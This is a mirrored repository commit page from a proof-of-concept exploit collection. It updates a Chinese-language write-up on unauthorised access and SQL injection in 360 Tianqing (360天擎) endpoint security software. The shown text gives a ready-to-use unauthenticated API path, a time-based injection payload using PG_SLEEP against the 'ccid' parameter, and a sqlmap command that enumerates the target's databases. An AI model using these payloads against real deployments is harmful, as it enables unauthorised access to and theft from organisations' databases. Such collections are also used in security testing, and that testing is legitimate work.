crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 20:24:57 +08:00
Code Issues Packages Projects Releases Wiki Activity

Update 360天擎 - 未授权与sql注入.md

Browse Source
This commit is contained in:
wy876 2023-10-18 18:41:08 +08:00 committed by GitHub
parent cfe4e82896
commit 524a2ed04c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
360天擎 - 未授权与sql注入.md
View File

@ -11,7 +11,7 @@
### 未授权漏洞 ### 未授权漏洞
```路由后拼接/api/dbstat/gettablessize``` ```路由后拼接/api/dbstat/gettablessize```
![](./assets/20231018183944.png)
### sql注入漏洞 ### sql注入漏洞
比较推荐的方式先测试是否存在数据库信息泄露存在的话大概率存在SQL注入 比较推荐的方式先测试是否存在数据库信息泄露存在的话大概率存在SQL注入
@ -20,5 +20,7 @@
{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)-- {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
``` ```
![](./assets/20231018184057.png)
## sqlmap ## sqlmap
python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1 python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1